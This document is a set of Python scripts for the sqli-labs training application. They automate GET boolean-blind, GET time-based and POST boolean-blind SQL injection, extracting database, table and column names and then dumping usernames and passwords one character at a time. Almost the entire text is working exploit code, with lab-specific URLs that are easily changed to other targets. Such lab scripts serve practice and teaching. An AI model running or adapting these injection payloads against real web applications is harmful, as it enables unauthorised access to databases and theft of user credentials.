GET布爾盲注
import requests
import time
import datetime
# 獲取數據庫名長度
def database_len():
    """Probe the length of the current database name on the Less-8 lab page.

    Boolean-based blind probe: the page shows the text 'You are in' only while
    the injected comparison `length(database())>N` is true, so the first guess
    for which that marker disappears is printed as the length. One HTTP GET per
    guess, at most nine requests; if the marker never disappears nothing is
    printed. The repeated `id=1' and length(database())>` pattern in the query
    string is the artefact a request-log rule would key on.
    """
    base = "http://10.211.55.7/sqli-labs-master/Less-8/"
    marker = 'You are in'
    for guess in range(1, 10):
        query = f"?id=1' and length(database())>{guess}"
        response = requests.get(f"{base}{query}%23")
        if marker in response.text:
            # Comparison still holds: the name is longer than `guess`.
            continue
        print('database_length:', guess)
        break
# Runs at import time: the script has no __main__ guard, so every probe below fires as soon as the file is executed.
database_len()
#獲取數據庫名
def database_name():
    """Recover the current database name one character at a time (Less-8).

    For positions 1..8 each candidate character is tried in turn; the first
    one for which the response still contains 'You are in' is accepted and the
    loop moves to the next position. A position with no matching candidate is
    skipped rather than reported. Worst case is 8 * len(charset) requests,
    each differing only in the substr() index and the compared character.
    """
    charset = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
    recovered = []
    for position in range(1, 9):
        for candidate in charset:
            url = (
                "http://10.211.55.7/sqli-labs-master/Less-8/?id=1' and substr(database(),"
                f"{position},1)='{candidate}'"
            )
            if 'You are in' in requests.get(url + '%23').text:
                recovered.append(candidate)
                break
    print('database_name:', ''.join(recovered))
# Runs at import time (no __main__ guard).
database_name()
# 獲取數據庫表
def tables_name():
    """Recover the comma-joined table list of the current schema (Less-8).

    Same character-at-a-time boolean probe as database_name(), applied to
    group_concat(table_name) from information_schema.tables; positions 1..29
    with a lowercase-plus-comma candidate set, so up to 29 * 27 requests.
    Positions with no matching candidate are skipped.
    """
    charset = 'abcdefghijklmnopqrstuvwxyz,'
    recovered = []
    for position in range(1, 30):
        for candidate in charset:
            url = (
                "http://10.211.55.7/sqli-labs-master/Less-8/?id=1' and substr("
                "(select group_concat(table_name) from information_schema.tables "
                f"where table_schema=database()),{position},1)='{candidate}'"
            )
            if 'You are in' in requests.get(url + '%23').text:
                recovered.append(candidate)
                break
    print('table_name:', ''.join(recovered))
# Runs at import time (no __main__ guard).
tables_name()
# 獲取表中字段
def columns_name():
    """Recover the comma-joined column list of the `users` table (Less-8).

    Same boolean probe as tables_name(), but over group_concat(column_name)
    from information_schema.columns filtered to table_name='users'. Positions
    1..29, lowercase-plus-comma candidates, unmatched positions skipped.
    """
    charset = 'abcdefghijklmnopqrstuvwxyz,'
    recovered = []
    for position in range(1, 30):
        for candidate in charset:
            url = (
                "http://10.211.55.7/sqli-labs-master/Less-8/?id=1' and substr("
                "(select group_concat(column_name) from information_schema.columns "
                f"where table_schema=database() and table_name='users'),{position},1)='{candidate}'"
            )
            if 'You are in' in requests.get(url + '%23').text:
                recovered.append(candidate)
                break
    print('column_name:', ''.join(recovered))
# Runs at import time (no __main__ guard).
columns_name()
# 獲取username
def username_value():
    """Recover the comma-joined `username` column of `users` (Less-8).

    Same boolean probe as database_name(); positions 1..99 with digits,
    lowercase letters, comma, underscore and hyphen as candidates, so up to
    99 * 39 requests. Unmatched positions are skipped.
    """
    charset = '0123456789abcdefghijklmnopqrstuvwxyz,_-'
    recovered = []
    for position in range(1, 100):
        for candidate in charset:
            url = (
                "http://10.211.55.7/sqli-labs-master/Less-8/?id=1' and substr("
                f"(select group_concat(username) from users),{position},1)='{candidate}'"
            )
            if 'You are in' in requests.get(url + '%23').text:
                recovered.append(candidate)
                break
    print('username_value:', ''.join(recovered))
# Runs at import time (no __main__ guard).
username_value()
# 獲取password
def password_value():
    """Recover the comma-joined `password` column of `users` (Less-8).

    Identical to username_value() except for the selected column; positions
    1..99, 39 candidates per position, unmatched positions skipped.
    """
    charset = '0123456789abcdefghijklmnopqrstuvwxyz,_-'
    recovered = []
    for position in range(1, 100):
        for candidate in charset:
            url = (
                "http://10.211.55.7/sqli-labs-master/Less-8/?id=1' and substr("
                f"(select group_concat(password) from users),{position},1)='{candidate}'"
            )
            if 'You are in' in requests.get(url + '%23').text:
                recovered.append(candidate)
                break
    print('password_value:', ''.join(recovered))
# Runs at import time (no __main__ guard).
password_value()
GET時間盲注
import datetime
import requests
import time
# 獲取數據庫名長度
def database_len():
    """Probe the database-name length on the Less-10 lab page by response delay.

    Time-based blind probe: the injected if() calls sleep(1) while
    `length(database())>N` holds, so a round trip of at least one whole second
    is read as "longer than guess". timedelta.seconds is the integer
    whole-second component, so anything under a full second counts as fast.
    Every guess is echoed; the first fast response ends the loop and the
    current guess is printed as the length (9 if no response was fast).
    """
    base = "http://10.211.55.7/sqli-labs-master/Less-10/"
    for guess in range(1, 10):
        query = f'?id=1" and if(length(database())>{guess},sleep(1),0)'
        started = datetime.datetime.now()
        requests.get(f"{base}{query}%23")
        elapsed = (datetime.datetime.now() - started).seconds
        print(guess)
        if elapsed < 1:
            break
    print('database_len:', guess)
# Runs at import time: no __main__ guard, and each probe below blocks for the sleep(1) round trips it triggers.
database_len()
# 獲取數據庫名
def database_name():
    """Recover the database name one character at a time by delay (Less-9).

    For positions 1..8 each candidate is tried; a round trip of at least one
    whole second (timedelta.seconds >= 1) means the if() took the sleep(1)
    branch and the candidate is accepted. Unmatched positions are skipped.
    Each accepted character costs at least one second of wall-clock time.
    """
    base = "http://10.211.55.7/sqli-labs-master/Less-9/"

    def delayed(query):
        # True when the request took at least one whole second.
        started = datetime.datetime.now()
        requests.get(base + query + '%23')
        return (datetime.datetime.now() - started).seconds >= 1

    recovered = []
    for position in range(1, 9):
        for candidate in '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz':
            query = f"?id=1' and if(substr(database(),{position},1)='{candidate}',sleep(1),1)"
            if delayed(query):
                recovered.append(candidate)
                break
    print('database_name:', ''.join(recovered))
# Runs at import time (no __main__ guard).
database_name()
# 獲取數據庫表
def table_name():
    """Recover the comma-joined table list of the current schema by delay (Less-9).

    Same timing oracle as database_name(), applied to group_concat(table_name)
    from information_schema.tables; positions 1..29 with a lowercase-plus-comma
    candidate set. Unmatched positions are skipped.
    """
    base = "http://10.211.55.7/sqli-labs-master/Less-9/"

    def delayed(query):
        # True when the request took at least one whole second.
        started = datetime.datetime.now()
        requests.get(base + query + '%23')
        return (datetime.datetime.now() - started).seconds >= 1

    recovered = []
    for position in range(1, 30):
        for candidate in 'abcdefghijklmnopqrstuvwxyz,':
            query = (
                "?id=1' and if(substr((select group_concat(table_name) from "
                "information_schema.tables where table_schema=database()),"
                f"{position},1)='{candidate}',sleep(1),1)"
            )
            if delayed(query):
                recovered.append(candidate)
                break
    print('table_name:', ''.join(recovered))
# Runs at import time (no __main__ guard).
table_name()
# 獲取表中字段
def column_name():
    """Recover the comma-joined column list of `users` by delay (Less-9).

    Same timing oracle as table_name(), over group_concat(column_name) from
    information_schema.columns filtered to table_name='users'; positions
    1..29, lowercase-plus-comma candidates, unmatched positions skipped.
    """
    base = "http://10.211.55.7/sqli-labs-master/Less-9/"

    def delayed(query):
        # True when the request took at least one whole second.
        started = datetime.datetime.now()
        requests.get(base + query + '%23')
        return (datetime.datetime.now() - started).seconds >= 1

    recovered = []
    for position in range(1, 30):
        for candidate in 'abcdefghijklmnopqrstuvwxyz,':
            query = (
                "?id=1' and if(substr((select group_concat(column_name) from "
                "information_schema.columns where table_schema=database() and "
                f"table_name='users'),{position},1)='{candidate}',sleep(1),1)"
            )
            if delayed(query):
                recovered.append(candidate)
                break
    print('column_name:', ''.join(recovered))
# Runs at import time (no __main__ guard).
column_name()
# 獲取username
def username_value():
    """Recover the comma-joined `username` column of `users` by delay (Less-9).

    Same timing oracle as database_name(); positions 1..99 with digits,
    lowercase letters, comma, underscore and hyphen as candidates. Unmatched
    positions are skipped. The query text keeps the original's space before
    the closing parenthesis after `users`.
    """
    base = "http://10.211.55.7/sqli-labs-master/Less-9/"

    def delayed(query):
        # True when the request took at least one whole second.
        started = datetime.datetime.now()
        requests.get(base + query + '%23')
        return (datetime.datetime.now() - started).seconds >= 1

    recovered = []
    for position in range(1, 100):
        for candidate in '0123456789abcdefghijklmnopqrstuvwxyz,_-':
            query = (
                "?id=1' and if(substr((select group_concat(username) from users ),"
                f"{position},1)='{candidate}',sleep(1),1)"
            )
            if delayed(query):
                recovered.append(candidate)
                break
    print('username_value:', ''.join(recovered))
# Runs at import time (no __main__ guard).
username_value()
# 獲取username
def password_value():
    """Recover the comma-joined `password` column of `users` by delay (Less-9).

    Identical to username_value() except for the selected column; positions
    1..99, 39 candidates per position, unmatched positions skipped.
    """
    base = "http://10.211.55.7/sqli-labs-master/Less-9/"

    def delayed(query):
        # True when the request took at least one whole second.
        started = datetime.datetime.now()
        requests.get(base + query + '%23')
        return (datetime.datetime.now() - started).seconds >= 1

    recovered = []
    for position in range(1, 100):
        for candidate in '0123456789abcdefghijklmnopqrstuvwxyz,_-':
            query = (
                "?id=1' and if(substr((select group_concat(password) from users ),"
                f"{position},1)='{candidate}',sleep(1),1)"
            )
            if delayed(query):
                recovered.append(candidate)
                break
    print('password_value:', ''.join(recovered))
# Runs at import time (no __main__ guard).
password_value()
POST布爾盲注
import requests
# 獲取數據庫名長度
def database_len():
    """Probe the database-name length through the Less-16 login form (POST).

    Boolean-based probe carried in the `uname` form field with a fixed
    `passwd` of 'admin'; a response containing 'flag.jpg' is read as the
    injected comparison being true. Each such guess is echoed; the first guess
    whose response lacks the marker is printed as the length and ends the
    loop. At most nine POST requests.
    """
    url = "http://10.211.55.7/sqli-labs-master/Less-16/"
    for guess in range(1, 10):
        form = {'uname': f'admin") and length(database())>{guess} #', 'passwd': 'admin'}
        response = requests.post(url, data=form)
        if 'flag.jpg' in response.text:
            print(guess)
            continue
        print('database_length:', guess)
        break
# Runs at import time: the script has no __main__ guard, so every probe below fires as soon as the file is executed.
database_len()
#獲取數據庫名
def database_name():
    """Recover the database name one character at a time via the Less-16 form.

    For positions 1..8 each candidate is POSTed in the `uname` field; the
    first one whose response contains 'flag.jpg' is accepted. Unmatched
    positions are skipped. Up to 8 * len(charset) POST requests.
    """
    url = "http://10.211.55.7/sqli-labs-master/Less-16/"
    recovered = []
    for position in range(1, 9):
        for candidate in '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz':
            form = {
                'uname': f"admin' and substr(database(),{position},1)='{candidate}' #",
                'passwd': 'admin',
            }
            if 'flag.jpg' in requests.post(url, data=form).text:
                recovered.append(candidate)
                break
    print('database_name:', ''.join(recovered))
# Runs at import time (no __main__ guard).
database_name()
#獲取數據庫表
def table_name():
    """Recover the comma-joined table list of the current schema via the Less-15 form.

    Same POST oracle as database_name() ('flag.jpg' in the response), applied
    to group_concat(table_name) from information_schema.tables; positions
    1..29, lowercase-plus-comma candidates, unmatched positions skipped.
    """
    url = "http://10.211.55.7/sqli-labs-master/Less-15/"
    recovered = []
    for position in range(1, 30):
        for candidate in 'abcdefghijklmnopqrstuvwxyz,':
            form = {
                'uname': (
                    "admin' and substr((select group_concat(table_name) from "
                    "information_schema.tables where table_schema=database()),"
                    f"{position},1)='{candidate}' #"
                ),
                'passwd': 'admin',
            }
            if 'flag.jpg' in requests.post(url, data=form).text:
                recovered.append(candidate)
                break
    print('table_name:', ''.join(recovered))
# Runs at import time (no __main__ guard).
table_name()
#獲取表中字段名
def column_name():
    """Recover the comma-joined column list of `users` via the Less-15 form.

    Same POST oracle as table_name(), over group_concat(column_name) from
    information_schema.columns filtered to table_name='users'; positions
    1..29, lowercase-plus-comma candidates, unmatched positions skipped.
    """
    url = "http://10.211.55.7/sqli-labs-master/Less-15/"
    recovered = []
    for position in range(1, 30):
        for candidate in 'abcdefghijklmnopqrstuvwxyz,':
            form = {
                'uname': (
                    "admin' and substr((select group_concat(column_name) from "
                    "information_schema.columns where table_schema=database() and "
                    f"table_name='users'),{position},1)='{candidate}' #"
                ),
                'passwd': 'admin',
            }
            if 'flag.jpg' in requests.post(url, data=form).text:
                recovered.append(candidate)
                break
    print('column_name:', ''.join(recovered))
# Runs at import time (no __main__ guard).
column_name()
#獲取username
def username_value():
    """Recover the comma-joined `username` column of `security.users` via the Less-15 form.

    Same POST oracle as database_name(); positions 1..99 with digits,
    lowercase letters, comma, underscore and hyphen as candidates, so up to
    99 * 39 requests. Unmatched positions are skipped.
    """
    url = "http://10.211.55.7/sqli-labs-master/Less-15/"
    recovered = []
    for position in range(1, 100):
        for candidate in '0123456789abcdefghijklmnopqrstuvwxyz,_-':
            form = {
                'uname': (
                    "admin' and substr((select group_concat(username) from security.users),"
                    f"{position},1)='{candidate}' #"
                ),
                'passwd': 'admin',
            }
            if 'flag.jpg' in requests.post(url, data=form).text:
                recovered.append(candidate)
                break
    print('username_value:', ''.join(recovered))
# Runs at import time (no __main__ guard).
username_value()
#獲取password
def password_value():
    """Recover the comma-joined `password` column of `security.users` via the Less-15 form.

    Identical to username_value() except for the selected column; positions
    1..99, 39 candidates per position, unmatched positions skipped.
    """
    url = "http://10.211.55.7/sqli-labs-master/Less-15/"
    recovered = []
    for position in range(1, 100):
        for candidate in '0123456789abcdefghijklmnopqrstuvwxyz,_-':
            form = {
                'uname': (
                    "admin' and substr((select group_concat(password) from security.users),"
                    f"{position},1)='{candidate}' #"
                ),
                'passwd': 'admin',
            }
            if 'flag.jpg' in requests.post(url, data=form).text:
                recovered.append(candidate)
                break
    print('password_value:', ''.join(recovered))
# Runs at import time (no __main__ guard).
password_value()